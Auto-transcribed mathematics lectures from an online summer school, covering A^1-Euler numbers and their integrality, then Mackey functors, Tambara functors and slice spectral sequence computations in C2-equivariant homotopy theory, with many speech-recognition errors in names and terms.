it's for a separable field extension by de barre manatelle of the jacobian we express um our our function sigma in terms of local coordinates and takes some derivatives then this is um uh the the same the same number up here um and while uh the number on the right hand side uh is uh some ones and some minus ones these these are not in general sums of ones and minus ones um they just have to sum to them uh uh and as suggested by the title uh this is proven uh with an integrality result the count of the lines on x reduced to a bundle on a grass manian that was defined over z it's the section that is defined over the interesting equations of x and that's why the um the left hand side here has all sorts of interesting summands and um the the right hand side picks up the fact that the brass manian is defined over z um so uh uh theorem two this is all joint with tom bachma um uh so let's let um the over y be a relatively uh oriented vector bundle with v and y defined over um z a join one over d factorial and d is greater than or equal to to to two um uh with y smooth and proper sm for smooth and proper over the same base um then the uh Euler number has to be in the subring uh uh generated by minus one and um the two three all the way up to d inside g w of k um and uh in the case of d equals two this leaves two possibilities so then either um e of v is the the quantity i think maybe i'll still be able to paste it this this quantity here um or uh it's what we get by um putting in a single two but but keeping keeping the the signature the same um uh so um uh we can distinguish between these um possibilities uh by uh taking uh an Euler number over some single prime where where two two is not a square and in order to to prove um the result about the symmetric powers um we use a characteristic class uh argument to get rid of this uh this second this second possibility um uh um the the characteristic class argument owes uh a lot to marco v and spit value characteristic classes um uh this would be a good time to to pause for for questions are there any any all right um so uh theorem two um is proven by using an an Euler class for good SL oriented theory um for example k o and uh the uh the d greater than or equal to two restriction comes from uh comes from wanting to use k o and there is um currently uh a collaboration on uh k o without inverting two um with uh Baptiste uh Calmez Emmanuel Dotto Yonatan Harpas um Fabian Habistrate uh Marcus Land Christian Moy Dennis Nardin Thomas Nicolaus Wolfgang Sturm and um Marcus Spitzveck um I understand also has work around this let's let's put that let's put Marcus Spitzveck um here too um uh so my understanding is that um that uh it is expected that um they will show that uh if you take k theory what let's call that uh kgl and taking a vector space to its dual gives a c2 action and you can take a a homotopy fixed points um of uh c2 and it's expected that the um uh if you if you make a substitute for Hermitian k theory by taking the homotopy fixed points of kgl and completing it too that it can be shown that um uh this is the growth of the group of z uh completed at two so this exists over at z so it exists over z um it's uh SL oriented and there's a um you can read about it in a paper of Bachman and Mike Hopkins um and while it doesn't respect base change it does have some maps and so this is sufficient the um to show the same integrality statement for d equals one to show um the integrality result theorem two um for d equals one um uh because the the Euler number with respect if we let this this gadget be k o prime um then the Euler number with respect to k o prime it's um it's here and there is enough functoriality so that we'll have to map to the if we pull back to z um joining one half to k o prime it'll it'll map to the corresponding number um moreover there there's a map from k o to k o prime um giving that the uh Euler number when k o exists over one half maps here too and the um uh since these two elements map to um uh the same element in there um they determine an element of this of the fiber product of g w z one half g w z completed at two um over g w z one half completed at two and this is g w of z um so uh the the we get the stronger integrality result um uh with with with that work uh in the spirit of a summer school i'd like to end with some open problems uh the uh the zero if open problem is can be expressed somewhat facetiously like this i there are a lot of um uh great results uh um in uh uh isan bud harris's uh 32 64 and all that or fulton's intersection theory um that uh give interesting enumerators results and um uh there are beautiful enumerative results having deep connections to uh uh many areas of mathematics so the zero if problem is can a one homotopy theory enrich enrich them uh so take a problem from isan bud harris 32 64 and all that fulton intersection theory let's give more of a preamble to this question um so um there are beautiful results in a one enumerative uh an enumerative geometry can a one homotopy theory enrich them and enumerative geometry uh can a one homotopy theory enrich them uh i don't think i wrote down um to uh taken um uh somewhat haphazardly from uh isan bud harris and i don't have time to write them down but let me just just read to so that we're on the same page about um the uh what what question zero is is trying to suggest so uh let v1 through v2n be general tangent vector fields in pn and how many points of pn is there a cotangent vector annihilated by all of them and uh another one is given four curves c1 c2 c3 c4 and p3 up degrees d1 d2 d3 d4 how many lines meet general translates of all four i'll add these to the notes and and put them in um uh to be less um hand wavy about this um in the corollary above we didn't have the analog of um the uh of interesting descriptions in terms of the the complete intersection itself so geometric interpretation in terms of x um they're the very concrete uh examples of this uh um for this jacobian which is sort of living on the on the um on the moduli space so beyond uh cubic surface quantic threefold the zoo um to connect up with marco rubolo's talk the um the the hock shield homology of that matrix factorization algebra that showed up it has a pairing on it and that pairing is the a1 millner number of the singularity and element of the the growth indeed bit group but there's also inside this um k-naught of varieties this cut and paste relation there's this motivic uh millner fiber and a compactly supported a1 Euler characteristic that mark levine uh told us about um so uh these this this should be all all equal um and uh uh the list should continue um the you you lose uh certain tools and you gain others for example and then yes he's um beautiful splitting principle uh the multiplicativity of Euler numbers and exact sequences is no longer nearly as useful because you really can't divide but the kazoo interpretation of Euler numbers gives you some control and exact sequences but in general it's hard so um are there better are there are there better tools uh there there is really structure here and an arithmetic information um that that lies away from c and what is it um i'll stop there thank you kirsten for a wonderful talk so um let's hear some questions and maybe i can ask by um by asking you if there's some connection between your work and oriented shoeboard calculus uh for other so matias vent um uh absolutely um so uh matias vent has information on the oriented chow of um uh gross monions in in terms of uh some generalizations of of shoeboard calculus and that gives uh other interesting ways to um to compute um these Euler numbers it doesn't directly use it but um that there is uh interesting things to be said about that okay great i have a question um from my face and so this last this last question the a1 milner number equals the um Euler characteristic of the notific milner fiber you said the left hand side comes from um a pairing on hoxhaw's homology can you say a little bit more about that um yeah um so um the i think maybe the um a better way to start with what the a1 milner number is is if um if you have a point p of f equals zero the a1 milner number um if this p is a singularity is um is can be defined to be this this local degree at p of the gradient of f but then this is also the hoxhaw homology of this matrix factorizations um uh uh for for f um and that's by explicitly marco told us that this was the jacobian ring um and uh this this local degree can be computed as the jacobian ring and this can be computed as the jacobian ring and the pairing on hoxhaw's homology is uh is the same so we get we get this equality here so this one wouldn't be part of the problem and then this one um uh i think is open what what what pairing is there on hoxhaw's homology uh great so um uh litman and uh uh um i'm blanking um so uh there's there's even a six-funker formalism uh in in hoxhaw's homology and it it's a way of expressing things about coherent duality in terms of of hoxhaw homology and um i am embarrassingly blanking on on the important names involved and in constructing that pairing um uh but it's also uh in in this context we wrote it down in the the women in topology group um to uh yeah great so and you're too young to be blanking on these things thanks i appreciate that okay and there's a nice question in the q and a if you're still gonna see that um yes so um uh the so for uh over a finite field um uh the three planes that um give you a square so over a finite field we had um um uh we have we have this um this growth indeed big group and um so in particular we're going to have a parity condition coming from uh three planes associated to um square or non-square local um local contributions and uh if you if you sum all of those non-square over odd degree field extensions with the square ones over even degree field extensions you'll have to get an even number of those and over things like cubic surface this corresponds to the difference between hyperbolic and elliptic lines um and if you come up with uh a sort of intrinsic to the complete intersection definition of what it means for this discriminant to be square or non-square or more generally what that Jacobian means then you get a concrete um uh uh totally independent of any um of any a1 homotopy theory restriction on on that complete intersection but even in terms of the Jacobian we get this this even parity condition so um by motivic by a1 Milner number um uh we met the left hand side and then by the motivic Milner fiber um uh I meant the um the construction uh that gives you this element of of canada varieties um with this motivic integration um uh so it's a yes uh um uh the construction um the construction is a little involved um uh uh the way I've seen it doesn't directly use I use nearby cycles functors but I wouldn't be surprised if if that's um uh my not knowing how to how to show the two are are closely related okay great then I have another question because in this homotopy limit problem you're completing at two is that uh so so you don't don't expect that we need to complete with respect to the huff map a down so just um um uh as far as I know but I think Tom would be the the better person to um to answer this question okay then and then the qna there's another question um yes yeah this yes this is the um thank you so cast Jesse Leo cast um and I did work on on on a1 Milner numbers thank you Stephen okay great any other questions I don't think so so thanks again Kirsten for a wonderful talk and see you all again tomorrow we start 1 p.m. Paris time
|
A^1-Euler numbers can be constructed with Hochschild homology, self-duality of Koszul complexes, pushforwards in Sl_c oriented cohomology theories, and sums of local degrees. We show an integrality result for A^1-Euler numbers and apply this to the enumeration of d-planes in complete intersections. Classically such counts are valid over the complex numbers and sometimes extended to the real numbers. A^1-homotopy theory allows one to perform counts over arbitrary fields, and records information about the arithmetic and geometry of the solutions with bilinear forms. For example, it then follows from work of Finashin–Kharlamov that there are 160;839⟨1⟩+160;650⟨-1⟩ 3-planes in any 7-dimensional cubic hypersurface when these 3-planes are counted with an appropriate weight. This is joint work with Tom Bachmann.
|
10.5446/50928 (DOI)
|
Thank you. Thank you very much for the invitation to speak. I'm really excited to be able to participate, albeit remotely. I'm glad that that worked out. Less glad that it had to work out, kind of wishing that the coronavirus were better under control, especially here in the US. But yeah, since I'm given the last talk, I get to also say I think we should thank the organizers. They've done a wonderful job taking an in-person conference and very quickly turning it into a great online conference. So please join me, I guess, somehow. Yeah, thank you, Ian. And great job. Guys, this is seriously fantastic. And I know it was a lot of work. So thank you very much. Okay, so as I said, I'm going to talk about techniques of computation in Equivariant and then some in Motivicomotopy, trying to hit on as many of the key words from that title of the conference as possible. I'm aiming this to be more introductory than sort of the research side. And please do, if you have questions, ask away. And I'll try to answer them as we go through. Most of my focus in the talk is going to be on the Equivariant computations. A lot of them for everyone's maybe second favorite group, the group with two elements. And the reason I'm going to be focusing on this one is, well, several fold. First, the group with two elements, which I'll call C2 from now on, is the Galois group, the complex numbers over the reels. This ties it to a lot of geometric and algebrao geometric concepts. Namely, if I want to talk about, say, descent for real vector bundles, it's the same thing as understanding a complex vector bundle together with this descent data of a C2 action. Second, a lot of classical and chromatic computations can be seen in this C2 Equivariant story. And actually, I know that that you all saw Dan Isaacson's series of talks earlier in the conference where he talked a lot about the connections between motivic over R, motivic over C, C2 Equivariant Homo Tope, and classical Homo Tope. So I'll pick up on some of those themes as well. And then finally, and this one really I should have led with, because in some ways it's the most important from my perspective, we can actually do computations here. A lot of the literature about Equivariant Homo Tope theory tends to suggest that computations are essentially impossible. Some of which go so far as to say it's impossible to do some of these. I don't find that to be the case. And I hope that by the end of my talk, you agree that a lot of these computations are much more doable than you may have thought initially. Okay, so I'm going to start by just saying that we're going to be working in the following context. There we go, lost my bit of a spell. I'm going to be working for working in what people sometimes call genuine Equivariant Homo Tope. Okay. Now, I hate the word genuine here. It's for two reasons. It's very value laden, especially when you compare it to the contrast. We will talk about naive Equivariant or genuine Equivariant. There's a distinct hierarchy established there, and it's not actually supported in the math. So what I would advocate for, and I hope I can start to get traction in this, is not to call this genuine, but rather to call it something instead like complete. And the complete here means that we have all transfers. And this is a theme that I'm going to spend a little bit of time talking about as we go forward. But before I do that, I'm actually going to start with just a little bit of a review. So how do we talk about computations and where do the invariants live? So how do we understand Homo Tope groups? G-Spectra and G-Spaces. And Dan also talked about... Sorry, there is a comment by Yuri Suleyma. He says that one version of G-Spectra is often called Borrel Complete. Yeah, that's true. I don't understand the frowny face there, Yuri. It is the case that the homotopically meaningful version of naive G-Spectra is Borrel Spectra. And here, we don't necessarily have transfers. These are things where we sort of free up the action historically. And I guess the not having transfers is probably why you had the frowny face. So I'm with you on that one. So in the equivariate context, the first thing that I run into is I can't get away from thinking about homotopy sheaves instead of homotopy groups. And of course, the real way we should be doing algebraic topology and sort of this ideal world where we have complete control over everything is I would be able to just immediately tell you what maps out of any, say, finite CW complex were. I'd love to be able to tell you what maps out of any finite CW complex are. We approximate this instead by restricting attention to maps out of the building blocks of finite CW complexes, namely spheres. I'm going to do the same thing for G-Spaces or G-Spectra. So we'll consider, we'll look at, at the functors. And these are functors from the category, which I'll call, fin G, op, into say, abelian groups. And this fin G op, this is the category of finite G sets. And equivariate maps. And I'm going to do this just via the Yoneda lemma. And so the ones I'm going to care about are, I'm going to take equivariate homotopy classes of maps from, oops, I'm describing a functor, from T plus, so T together with the district base point, smashed with the n-sphere, into some fixed G-Spectrum E. And my superscript G here is just reminding myself that I'm taking the collection of equivariate maps. This is, this is a contrivariate functor as written because I'm mapping out of the T plus slot. And so in particular, it fits into this form. And this is what I'm called the homotopy coefficient system. Already, I'm suggesting a way that I should be thinking about my G-CW complexes. The CW complexes I'm going to build, not just out of spheres with a trivial action, but rather out of spheres, again with a trivial action, but I allow myself to take disjoint unions of these and to permute the copies of the spheres in those stacks. And that's how the group is going to be acting. So I can map out of this and this amounts to picking out maps from spheres into various fixed points. So the first thing to notice is that if I have a disjoint union of things, so T, disjoint union T prime, and then I take the disjoint base point and smash this with the n-sphere, map this into E, then the inclusions of T and T prime into the disjoint union give me a pair of maps backwards. And so I get a decomposition like this. So in other words, my functor from finite G sets op into abelian groups isn't any old functor, it's one that takes the disjoint union, which is the co-product in finite G sets, which makes it the product in finite G sets op to the product in abelian groups. So in other words, this construction gives me a product preserving functor. And I want to stress here that I'm in the algebraic context, so saying that I'm a product preserving functor is a property of the functor rather than additional structure. Well any G set has an orbit decomposition, so this functor, slot plus smash Sn into E, E is determined by the values on orbits, by which I mean transitive G sets. So G mod H, as H varies over the subgroups. And if you haven't seen this before, then I would suggest that you spend a little bit of time thinking about what's the geometric content maps out of G mod H, equivariate maps out of G mod H into some G space. And you can start to see the interplay between fixed points for various subgroups and then G itself. Okay, now this is the kind of thing that I didn't need to be working in G spectra yet. I could have made sense of this in G spaces, provided N was at least two. And if I'm in G spectra, any kind of G spectra, be it the Burrell ones that Yuri brought up, be it the complete ones that I'll be working in, or anything in between, I still have these homotopy coefficient systems. The key feature of the complete equivariate homotopy is that I have not only these contravariant restriction maps, but also the covariant transfer maps. So I'm going to define a category, the Burnside category, of G has objects, finite G sets, and the morphisms, so home in the Burnside category from S to T is going to be, well, I'll be a little glib here and just put parenthetically the group completion of the set of correspondences, S and T. So here I have two equivariate maps, F and G, and then I'm doing this up to isomorphism. So again, I'm going to be working in an algebraic context, so I'm working up to isomorphism. As you know from Clark's work or Angelica's, then I could have instead considered an enrichment of this, be it one where I have a two category, and instead of considering this up to isomorphism, I remember the isomorphisms as the two categorical part of the data, or an infinity category where I build much larger diagrams, again recording isomorphisms and various pullback conditions. Oh, and I should say, if I'm going to say that I have a category, I need to say what the composition law is, and composition is via pullback. So given two correspondences, then I can pull them back, and I get another correspondence. Okay, so in this category, since the category is the same as the category of, excuse me, the objects are the same as the category of finite g sets, I can still talk about things like district union and Cartesian product. In this category, though, well, the Burnside category, it's canonically self-dual. And by canonically, I mean, it's the identity on objects. And then I just observe that I have my correspondence, which has, you know, that maps in two different directions. And that's just a sort of an artifact of the way I'm writing. I'm choosing to read from left to right, because that's the only way I know how to read English. But I could have instead swapped it and gone from right to left. Then I would be seeing instead harm from as written right here, that would be the same thing as harm from T to S. So A is, oh, I should have given this name. Sorry, script A. So A is canonically self-dual. And the district union is now both the product and the coproduct. And if you haven't spent any time working with this category or sort of thinking through what this might look like, I would suggest seeing for yourself how the district union could possibly be the product. In other words, C, how do I write down maps in the Burnside category from T, district union, T prime, back to T and back to T prime? Whereas in general, I'm not going to have those maps just in finite g sets. So the players in the equivariate context in this complete one are Mackey functors. So a Mackey functor is, again, product preserving. Functor from the Burnside category into Abelian groups. And I'm always going to indicate my Mackey functors with an underline so that there'll be a little bit of type checking to contrast these with Abelian groups. Again, any g set can be decomposed into orbits. And if I use that orbit decomposition, I get that a Mackey functor is determined by a much smaller amount of data. So let me spell that out. For g is cp. And I'm going to name a generator cp. So choose a generator to be, say, gamma. Okay. A cp Mackey functor is the following data. I have first an Abelian group. M of g mod g, which is a point. Second, I have a cp module. M of cp. And third, I have maps, a restriction, which goes from M of a point to M of cp. And a transfer. M of cp to M of a point. And I'll often write this as a little diagram that people call a Lewis diagram after Gaunt's Lewis. My restriction goes like this. And my transfer goes up. And then I have an action of my group cp on the cp module. And then you satisfy a few axioms. So first, the restriction, the restriction lands in the cp fixed points. And the transfer factors through the co-invariance. And then second, I have a condition called the Mackey double coset formula, which says that the composite of the restriction with the transfer is the sum over the elements of the group. Which is sometimes called the trace if you use the Galois theory names. Okay. So that's it. And how am I supposed to connect these two correspondences? So how am I supposed to see this as something coming from the Burnside category? Well, remember that I have in the Burnside category, I have, or excuse me, in the category of finite cp sets, I have a map cp to a point. That's just the crush everything map. And I have a map from cp to itself that's multiplication by gamma. And this gives me a little commutative diagram because point is terminal. Now, when I think the category of finite g sets, I can embed that covariantly as the forward direction map in the Burnside category, or I can embed it contravariantly as the backwards map in the Burnside category. And if I embed it contravariantly, that gave me my restriction map, this one. And if I embed it covariantly, that gave me the transfer map. So both of these two maps here, the restriction and the transfer, arose from this quotient map from cp to a point. And then the first conditions, this one about the image of the restriction landing in the fixed points, or the transfer factoring through the orbits, are exactly summed up in the commutativity of this little triangle. So it's actually just the functoriality condition. And finally, this Mach-E-Double-Coset condition, this is what you see if you pull back cp over a point with cp over a point, and the pullback is cp cross cp. And then I want to write that in terms of cp sets. So I want to break it up into its orbit decomposition. And when you do that, you get exactly this condition. Okay, let me make it a little more concrete, because I will actually do a couple of computations later. And I want to be able to use these. So there's the representable functor, the Burnside Mach-E functor. The value at a point is given by z direct sum z. And the value at cp is z. And then the restriction and transfer maps. I'll just write them as little matrices. This one sends the first thing to one and a second to p. And the second is zero, one. The vial action here is just by the identity. So as I said, this is actually the functor I get by mapping out of a point in the Burnside category. Again, this is product preserving because Dissert Union was the product. And so it's literally the universal property of the product to say that HOM out of a point is product preserving. Okay, if you've also seen the Burnside ring, the Burnside ring is the Grotendieck group of finite g sets. So I should also be able to connect these two summands to finite g sets. And I can, this summand is the g set point and the district union of copies of point. And this one is the g set cp as a cp set. And every cp set breaks up into a district union of points and cp. And then my restriction map is just forget the cp action and just remember the set. And that takes point to a set with one element, and it takes cp to a set with p elements and that was this map. Okay, so the other that I want is the constant Mach-e-funkter z. And this one is the value at point is z. The value at the at cp is also z. The restriction map is the identity, the vial group. Oops, sorry. Vial group action is also the identity. And then that forces the transfer to be multiplication by p. Because since the restriction is injective, then I can compute the transfer by computing the composite of the restriction with the transfer. And I see I have no choice here. These two Mach-e-funkters are pretty closely connected. The target is what sometimes called a cohomological Mach-e-funkter. Now, this one, I should pause and connect this already to what we see in the motivic story. Often when we talk about pre-sheaves with transfers in motivic homotopy, we're referring to things like this that are close to cohomologic Mach-e-funkters. And there I see the same kind of condition that the composite of the transfer and the restriction is multiplication by the index of the group. And that's the condition that I'm writing down here. In equivariant homotopy, we allow these more general kinds of transfers, which you should think of as actually also showing up in the motivic context. This is analogous to the transfer along, say, a finite etal map. Okay. So before I continue, questions about this so far. I know a lot of this is review, but that doesn't mean the questions won't have come up. You said A underline is a Bernstein Mach-e-funkter. Yes. That's my name. Yes. Okay. And it's the usual thing in math where proper names become adjectives. And so you end up with long strings. So Sean asks why cohomological? Is this an important distinction? These do show up a lot. And they're the kinds of Mach-e-funkters that you see with group cohomology. And that's one of the reasons why I might describe them that way. So from that perspective, it is a very natural class of Mach-e-funkters that arises. And so there's been a lot of work in this. For us, the constant Mach-e-funkter Z is a fairly easy one to do computations with, as I'll show you in just a minute. And it also arises naturally in the equivariate context. Yes. Group cohomology does take values in these. Group cohomology naturally has an extension to a Mach-e-funkter. And when I do group cohomology, I consider it in one of these contexts. And they're always coming from modules. It's always something that's a module over the constant Mach-e-funkter Z. No. Thanks for asking. Okay. So the reason that we talk about Mach-e-funkters in equivariate homotopy is that Mach-e-funkters play the role of abelian groups. So in genuine G-spectra. In other words, all of our usual algebraic invariance are actually Mach-e-funkter valued. So for example, normally I might talk about homotopy groups of a spectrum. And in the equivariate context, I have the homotopy Mach-e-funkters, an equivariate spectrum. I can talk about the generalized cohomology theory's value on a space or spectrum. And in the equivariate context, I have a Mach-e-funkter's worth of the cohomology of X in some E theory. So I have a richer structure that I could be working with. For those who might worry or wonder about such things, the category of Mach-e-funkters is an abelian category. We have enough projectives and injectives so we can do homological algebra the way we normally would. And then in a little bit, I'll also talk about how the category of Mach-e-funkters has a symmetric minoidal product. So we're really exactly like with abelian groups as reflecting what we saw in spectra, we build a model in DG abelian groups. We can do the same thing in equivariate spectra. We take equivariate spectra and we compare it to DG Mach-e-funkters or DGAs in Mach-e-funkters. So one of the things that I want to be able to do is talk about ordinary homology. And I find it easier when I'm talking about ordinary homology to just show you how to compute this in some examples. So how do we compute homology? And remember this is supposed to be a Mach-e-funkter, but I'll just tell you the value of this at some point with coefficients in something. And now just for simplicity for myself, I'll start at this point switching to the group being C2. So had I planned, I had to use some of the newer technology, I would ask via a poll, what's your favorite way to compute ordinary homology? You know, it's like we would do in a calculus class, do like a quick spot check. But if I were to do that, I would guess, I would guess you would say cellular as opposed to singular. Although singular is certainly nice for sort of formal reasons. Yeah, thank you. And yeah, cellular is the way that we actually can compute things easily. We write down a small chain complex to do it. So let's do that here. And let's start with an example. So we'll just do this via cellular homology. And my example is going to be, let's look at a representation sphere. So I'm going to take S to the C, by which I mean the one point compactification of C. And then C, remember I said earlier, my C2 is also the Galois group of C over R. And so this naturally has an action of C2 as the Galois action. So if I were to draw this, well, this is the Riemann sphere. So I have the real line sitting inside the Riemann sphere. And then I have the two hemispheres. And here was my S to the R sitting as the equator. And S to the R, well, this is just S1. And when I think of the two hemispheres in my Riemann sphere, well, I could put them in as showing up. And actually, I'm doing a different projection than you're probably thinking of. I'm going to have the positive complex part being the upper hemisphere, excuse me, the positive imaginary part being the upper hemisphere and the negative imaginary part being the lower hemisphere. So my group acts by swapping the two hemispheres and leaving the equator fixed. So I can build this as an equivalent cell complex. I have two copies of the one sphere, and they're swapped. So I'm going to have a C2 cross S1, because that's two copies of the one sphere. I'll draw a cartoon as I go through. It's my one sphere and my one sphere. And they should have been the same. And the group acts by swapping them. So this is C2 cross S1. And I'm going to map this to the one sphere where I just fold them down. So it's via the identity. It's a twisted version of the fold map. And then I can include these into the corresponding C2 cross disks. And that amounts to just putting in a little disk on each of these. And when I pushed this out, so actually let me, let me do it this way. Oops. Too much. When I push this out, now I've exactly built my Riemann sphere with the two hemispheres that are swapped. So here's my cell structure. And if I want to take the cellular homology, well, what I need to do is figure out what am I supposed to do when I evaluate what's the homology of one of these g mod h cross a sphere or g mod h plus smash a sphere. So the building block is I'm going to take the homology hn of, whoops, also h star of g mod h cross an n sphere with coefficients in some Mach-E functor m. Well, this is going to be, I'll do reduced. This is 0 if star is not n. And it's just evaluate m at g mod h if star equals n. Now I can start to write down what, what my homology is going to look like. Notice that this map here, this one, this is the same thing as c2 to a point crossed with the one sphere. And remember, my Mach-E functors are exactly built so that they know what I'm supposed to do to maps between orbits. So a map c2 to a point, this is something that I can evaluate my Mach-E functor on. Now I can write down that chain complex using that. So in degree zero, again, I'm doing the reduced theory. I have nothing. Here's my degree. In degree one, well, I had my one cell, there's only one one cell and it's the one sphere. So I have m of a point. And in degree two, I had a single equivariate two cell. It was the one coming from m of c2. And the cellular boundary map is just m of c2 going to a point. So notice this is the covariate version of this. So this is the transfer from m of c2 to m of a point. And this tells me how I can write down this homology for any of these. So I get h1 is the co-kernel of the transfer. And h2 is the kernel of the transfer. And it's a little more work. You can get these as instead Mach-E value to things. It amounts to thinking about g mod h and putting in another slot where I crossed with some fixed t. Okay. So since this is a talk in the broader context of a summer school, maybe I'll say as an exercise for you. Oops. As an exercise, figure out the homology groups of s, k times c with coefficients in any Mach-E functor m for all k and m. You can use the same idea that I talked about here. You have to think a little bit about what happens in the co-homology version. So namely when k is negative. But it's fun to work through. Okay. There's one other thing that I want to point out here. And that's actually right here. I am going to give a name to this map from s1 into this c sphere. I'm going to call this a sub sigma. I'm going to call this sometimes the Euler class of the sine representation. And if I'm being super pedantic, I'd actually call this the suspension a sigma. Because a sigma is a map from the zero sphere into now instead, it's just the one point compactification of the imaginary axis in c where that's swapped. Because, well, we know how complex conjugation works. And here I'm seeing this co-fiber sequence. c2 goes to the zero sphere or c2 plus goes to the zero sphere. And the co-fiber is the sine sphere. And this whole part that I'm writing down in this case is the suspension of that co-fiber sequence. So it's something to keep in mind. All right. So I brought this up because just doing these computations, understanding the cosmology of these spheres, the k times c spheres as k varies, allows you to get a lot of mileage equivariately. So I'll start with a theorem. And this is due to lots of people individually. I'm going to say that the first parts of this is due to Duggar. It's due to Who Creash. And it's due to me, Hopkins, and Ravino. And that is that there's a filtration on the c2 spectrum of real boredism. So M-U-R. Or again, if you're coming from the motivic context, you should think of this as MGL. And then the theorem is due to different people. So, and, more typically, it's due to Hopkins, and Morrell, and, where we are. And there's a filtration on M-U-R, ding, with associated graded. Ger of M-U-R is, I'll just write it as the Eilenberg-McLean spectrum associated to that constant Mach-E-Functor Z. And then I'm putting in a bunch of formal indeterminates, where the degree of each of these indeterminates is just like in Dan's talks, my indeterminates are going to be graded by representations, or in this case, they're bi-graded. Actually, I have two irreducible representations. And this is just I times c. Or again, I'm using the complex conjugation action on c. What this means is, if I want to compute the M-U-R homology, or M-U-R co-homology of some space or spectrum, then I have a spectral sequence. And the E2 term is given by, well, say the homology, but I'll write it this way. I'm going to do the homotopy, again, homotopy Mach-E-Functors of the function spectrum from, say, x into Hz, I join these indeterminates. Well, this is just the homology of x with coefficients in z. And then I join a bunch of indeterminates. And this spectral sequence converges to the M-U-R co-homology of x. So it's like in a T. Here's a Brooks spectral sequence, but I'm using this different filtration. And the filtration is the slice filtration named after the motivic slice filtration of Wewodski that was done by Duggar initially. Okay, so what I want to focus on, and I'm seeing that time quickly passes. So what I want to focus on is that this is a spectral sequence of Mach-E-Functors. So this is sort of the first order approximation to understanding the way I can do equivariate computations. Mach-E-Functors form an abelian category, which means I can talk about spectral sequences of Mach-E-Functors. And in this case, what does that mean? We have two spectral sequences. There's the fixed points, the value at a point, and there's the underlying. And then they're connected. I have a map of spectral sequences that's reflecting my restriction map from the fixed ones, the underlying. And I have a map of spectral sequences from the underlying back to the fixed points. And the underlying was actually a spectral sequence of C2 modules. So I have all of this added structure that comes in. It's a lot of added structure, but it's not an insurmountable amount of added structure. The biggest thing I can do is I can use the fact that since these are maps of spectral sequences, if I have a class that's a cycle or maybe a permanent cycle, then the image of that under any map of spectral sequences is a cycle or a permanent cycle. If I have a class that's the target of a differential, then I know that under a map of spectral sequences, it's still the target of a differential. So I get a lot of additional constraints on this. So as just an example, in the spectral sequence computing the homotopy Machi functors of MUR, the ideal generated by 2 is an ideal of permanent cycles. And so why? It's just because two times any class X, remember, I'm looking at something where I started with the constant Machi functor Z and in the constant Machi functor Z, 2 was the transfer of 1 in the underlying. And then I have this Frobenius reciprocity condition. Let's me move the X inside. This is the transfer of 1 times the restriction of X. So this is the transfer of the restriction of X. And in the underlying spectral sequence, the underlying spectral sequence is just the ordinary Atiya-Hirzberg spectral sequence computing the homotopy of MU out of the homotopy of MU. So it collapses with no extensions. And the restriction here is a permanent cycle. Oops, it's not useful always. So that's giving me a huge amount of information about the structure of the spectral sequence that I don't know how I would have known otherwise. I needed that this large number of classes, namely twice anything, could actually be written via the Machi structure as a permanent cycle. Okay, so in the time remaining, I need to push into bigger groups and I need to talk a little bit about the the the structure. I've already started to dance around some of this. First, you'll notice I used a different wild card here than my asterisk. I used a five-pointed star. Here, here, here, and then here I just used the ordinary asterisk. So this one, this wild card was following notation of who increased. This is the ROC2 grading. So I actually have more information that I have at my fingertips. And second, I talked about an ideal here, which says that I should be thinking about this actually as a spectral sequence of rings. And that's true, but I won't go too much into it. So in fact, the slice spectral sequence is a spectral sequence of commutative monoids in Machi functors. And these are called green functors. Sean asks if there's a that there's a result saying differentials are power operations. Yes, yes. The maybe the best way to say what the differentials are in the classical ATIA here's a spectral sequence is that they're cohomology operations because they're maps connecting between Annenberg-McLean spectra. And here in for for something like MUR, the fibers are again suspensions of Annenberg-McLean spectra. So the initial differentials are exactly cohomology operations, in this case from cohomology with constant Z coefficients to itself. And then all of the higher differentials can be expressed as secondary or or higher order operations, just as we would see with the ordinary ATIA here's a book spectral sequence. In this case, it's a it's a consequence of knowing the form of the spectral sequence, knowing that the fibers are all these generalized Annenberg-McLean spectra. But yeah, I can think of them in exactly that way. Okay, so I'm in that the time remaining, and I've said that already, I want to do one last added bit of structure. So here I've used that the Mackie structure shows up, and it gives me a way to produce a bunch of permanent cycles, and to transport differentials. Then I know that this is a spectral sequence of these ring objects, these green functors. So I understand that at each page, I have a ring and for each g mod h, I have a ring, the restriction maps are all ring maps. And so I can use all of this to to continue to bind classes to other classes and simplify the problem. The last part is to use the norm. So we have also multiplicative transfers. And these are actually arising from functors quite generally on on the complete spectra. So I have a norm functor from H spectra to G spectra. And this is a symmetric minoidal functor that's going to take some E, and you should think about it as going to, I'm going to smash together g mod h copies of E. Ie, this is a tensor induction. And these norm maps have the property that since the tensor product is the co product on commutative rings, I have canonical maps. I have canonical maps for any commutative ring. In G spectra, I have a map from the norm of the restriction of R back to R. This endows the homotopy Mackey functors of R with these external norm maps. And here I have to use the grading by the representation grid. Oops. So just as earlier when I talked about the sum over the bio group or the sum over G being the trace, I'm using the Galois theoretic language there. Here I'm also using the Galois theoretic language. You should think of this as being as being heuristically the product over G mod h of some element. And since my ring is commutative, if the group is acting by permuting now the tensor factors around, but the multiplication is actually commutative, so it doesn't care what order they were in. This gives me a way to take an element that's fixed by H and produce an element that's fixed now by G. This structure was first studied by Tambara who looked at these and called them TNR functors, these sort of Mackey functors together with multiplicative transfers. And the last result is the slice spectral sequence is a spectral sequence of Tambara functors. This one, I don't know how to show this in the motivic context. The analogous operations, the analogous norms and normed motivic spectra were done by Bachman and Hoy-Waugh. They described how you can think about the norm maps and how to build these added norm, external norm maps on commutative monoids in this context. And I would expect that the slice spectral sequence should have this property. In the equivariant context, the somewhat surprising feature is that the slice filtration is actually the universal filtration that has the property that it takes commutative monoids in spectra to a spectral sequence of Tambara functors. And if there are questions about that afterwards, I'll answer it. So I saw you pop in, so I know that I'm almost out of time. So let me just say a punchline. And that is what the hell does it mean to be a spectral sequence of Tambara functors? So it means that we have... So I was popping for questions, but you can take times. Oh, okay. I reserve my question. All right. So we have a twisted version of the Leibniz rule. And let me just spell that out in one case. So I have the... I just need to listen. I have the differential on some class that I'll write as the norm of x. Again, heuristically, so I'll do this in a different color because this part's a lie. This is supposed to be x times the conjugate of x. And then I know from the Leibniz rule how to compute the differential on a product. This is the differential on x times gamma x plus x times the differential on gamma x. Remember, the differentials were maps of Machi functors, so I can pull the vial action out. So this is dx times gamma x plus x times gamma of dx. And this is the same thing then as 1 plus gamma on x times... Oops, not the one I want to do. dx times gamma x. And now I can make this true statement, which is the transfer of dx times gamma x. So this is the version of the Leibniz rule that shows up in this case. The differential on the norm, it's just like on a product, but I'm supposed to remember that the norm was a kind of product where the group permuted the factors around. And so the differential is going to take that to a sum where, again, the group permutes now the summands 